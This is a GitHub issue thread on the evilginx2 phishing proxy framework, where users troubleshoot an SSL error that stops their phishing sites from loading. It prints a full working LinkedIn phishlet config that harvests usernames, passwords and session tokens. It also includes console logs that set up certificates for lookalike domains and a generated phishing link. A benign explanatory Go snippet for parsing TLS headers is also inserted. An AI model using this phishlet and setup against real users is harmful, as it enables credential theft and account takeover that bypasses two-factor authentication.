kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License

Received ERR_SSL_PROTOCOL_ERROR in Chrome #95

Closed anicec4t closed 5 years ago

anicec4t commented 5 years ago

The phish link is responding with "ERR_SSL_PROTOCOL_ERROR" in chrome for different web sites... any clues?

kgretzky commented 5 years ago

More info?

anicec4t commented 5 years ago

I've done some phishlets for some client and when I test them Chrome gives me ERR_SSL_PROTOCOL_ERROR. In the framework console of evilginx2 there is no message like "new visitor".....

anicec4t commented 5 years ago

Can it be because the phishlets are maybe not done right? Or not complete?

kgretzky commented 5 years ago

What phishlets? What version? I have nothing to work with here.

anicec4t commented 5 years ago

evilginx version 2.0. The phishlet was created by me; it is not a phishlet already included in the framework.

anicec4t commented 5 years ago

Any clue how to check if my phishlet is done right, so we can exclude that?

anicec4t commented 5 years ago

Found out where the problem is. I will come up with a detailed view in a few minutes.

anicec4t commented 5 years ago

Okay, so the problem is when you create new yaml phishlets using pico (as I did): after you save them, pico adds an extra byte to the file, causing the evilginx server to act strange.

I tested as follows:

test 1: using the linkedin.yaml included in the framework - all went well

test 2: cat the linkedin.yaml and copy-paste the output to a file called test2.yaml - both of the files looked the same when I did the cat - received the SSL error

kgretzky commented 5 years ago

Isn't it because you have two phishlets running with the same configuration and evilginx sends a wrong cert for the wrong domain? It would help if you pasted the full error.

anicec4t commented 5 years ago

This site can’t provide a secure connection www.testtting-domain.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR

kgretzky commented 5 years ago

I'm sure there are more details to this error if you look carefully.

anicec4t commented 5 years ago

This is the full error. Tests were done using the same linkedin phishlet; also, before activating the phishlet, I did the phishlet disable name command.

anicec4t commented 5 years ago

Nope, that is the only error; Chrome does not show any more details :(

anicec4t commented 5 years ago

Firefox gives: Secure Connection Failed

An error occurred during a connection to www.handler-mobile.online. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG

The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.

anicec4t commented 5 years ago

Check this and see: https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D

anicec4t commented 5 years ago

Output of evil..

[12:41:19] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets hostname sure handler-mobile.online
[12:41:33] [inf] phishlet 'sure' hostname set to: handler-mobile.online
[12:41:33] [inf] disabled phishlet 'sure'
: phishlets enable sure
[12:41:33] [inf] enabled phishlet 'sure'
[12:41:33] [inf] setting up certificates for phishlet 'sure'...
[12:41:33] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets get-url sure https://google.com/

anicec4t commented 5 years ago

If you have the sub_filters: not complete, can that cause the error?

kgretzky commented 5 years ago

So you say that example phishlets work fine, but just not the one you made yourself? Phishlet validation is coming in version 2.2, which is a few weeks away.

anicec4t commented 5 years ago

This one used now is a copy-paste of the included one for linkedin.

anicec4t commented 5 years ago

What I was asking was: if I create a phishlet for x web site and for some reason I don't make it complete (let's say I don't add action= ..), can this be the cause of that error, in the case that the YAML file is written syntax-right?

anicec4t commented 5 years ago

cbc8b6f0dd29a53c5487449d9501f540 linkedin.yaml
cbc8b6f0dd29a53c5487449d9501f540 sure.yaml

linkedin.yaml

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

sure.yaml

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

anicec4t commented 5 years ago

[12:58:03] [inf] setting up certificates for phishlet 'sure'...
[12:58:03] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets hostname sure handler-mobile.online
[12:58:10] [inf] phishlet 'sure' hostname set to: handler-mobile.online
[12:58:10] [inf] disabled phishlet 'sure'
: phishlets enable sure
[12:58:10] [inf] enabled phishlet 'sure'
[12:58:10] [inf] setting up certificates for phishlet 'sure'...
[12:58:10] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online]
: phishlets get-url sure https://google.com/

https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D

anicec4t commented 5 years ago

Same error. Chrome: This site can’t provide a secure connection www.handler-mobile.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR

kgretzky commented 5 years ago

What phishlets do you have enabled when this error appears?

anicec4t commented 5 years ago

Hi, I used the linkedin one.

kafkaesqu3 commented 5 years ago

Hey, I'm getting this error also with a custom phishlet I have been working on. I did a PCAP on my test machine and my evilginx server; it looks like the evilginx server is sending a 502 Bad Gateway response when the client sends the TLS Client Hello.

The issue appears on Chrome/Firefox on Mac/Windows hosts.

My evilginx is running on Ubuntu 18.04.1

Nothing is printed in the debug log, and the issue happens in normal mode as well as developer mode.

My phishlet is the only one enabled.

This is causing some head scratches between me and a few friends who have tried troubleshooting.

I would be happy to share my phishlet with you via PM or email, or any other information which can be helpful to you. It's possible the issue is in my phishlet; it's the first one I've written.

EDIT: Alright, looks like I solved this one right after posting. I love it when that happens! I was testing a few variations of my phishlet, and each of them had the same name. As soon as I changed the phishlet name, it started working. Duplicate phishlet names = bad.
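The PCAP observation above (a plaintext 502 arriving where the ServerHello should be) also explains the SSL_ERROR_RX_RECORD_TOO_LONG that Firefox reported earlier in the thread: the browser parses whatever comes back as a TLS record header, and the ASCII bytes of "HTTP/" decode to an impossible length. The Go snippet below is added here as an illustration of that parsing step; it is not part of evilginx2 or of any comment in this thread, and the sample bytes it is tested with are constructed.

```go
package main

import (
	"bytes"
	"errors"
)

// RFC 5246 caps a TLS record fragment at 2^14 + 2048 bytes; NSS reports a larger length field as SSL_ERROR_RX_RECORD_TOO_LONG.
const maxTLSRecordLen = 16384 + 2048

// RecordHeader is the 5-byte TLS record-layer header a browser parses before anything else.
type RecordHeader struct {
	ContentType byte   // 20 change_cipher_spec, 21 alert, 22 handshake, 23 application_data
	Version     uint16 // legacy record version, e.g. 0x0303
	Length      uint16 // fragment length
}

var (
	ErrRecordTooLong = errors.New("SSL_ERROR_RX_RECORD_TOO_LONG")
	ErrBadContent    = errors.New("unknown TLS content type")
)

// ParseRecordHeader decodes the header with the sanity checks a client applies.
// Fed "HTTP/1.1 502 ..." it reads length 'P','/' = 0x502f = 20527 > 18432 and fails the way Firefox did.
func ParseRecordHeader(b []byte) (RecordHeader, error) {
	if len(b) < 5 {
		return RecordHeader{}, errors.New("fewer than 5 bytes received")
	}
	h := RecordHeader{
		ContentType: b[0],
		Version:     uint16(b[1])<<8 | uint16(b[2]),
		Length:      uint16(b[3])<<8 | uint16(b[4]),
	}
	if h.Length > maxTLSRecordLen {
		return h, ErrRecordTooLong
	}
	if h.ContentType < 20 || h.ContentType > 23 {
		return h, ErrBadContent
	}
	return h, nil
}

// PlaintextStatusLine reports whether the server answered the ClientHello with unencrypted HTTP (the 502 seen in the PCAP) and returns its status line.
func PlaintextStatusLine(b []byte) (string, bool) {
	if !bytes.HasPrefix(b, []byte("HTTP/")) {
		return "", false
	}
	line := bytes.SplitN(b, []byte("\r\n"), 2)[0]
	return string(line), true
}
```

Running the first bytes of a captured server reply through both functions tells you whether the failure is a TLS-level problem (bad certificate, alert) or a proxy that never started a handshake at all, which is the duplicate-name case this thread ends on.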

anicec4t commented 5 years ago

So what you are saying is that if a phishlet is not done right and has the name "aaa", and you edit it and reload evilginx, it will give you the same error, so you have to rename it after the edit to aaa1, right?

kgretzky commented 5 years ago

@kafkaesqu3 Glad to hear that fixed it :)

Version 2.2.0 is adding a lot of phishlet validation, but it seems I need to also add a check for duplicate phishlet names. Thanks.

kgretzky commented 5 years ago

I think it is wiser to just remove the name variable from phishlet file format and instead rely on the name of the filename without .yaml extension. Filenames will provide the uniqueness which is required and will decrease the confusion, making it all less error prone for phishlet creators. Too easy to make this mistake now.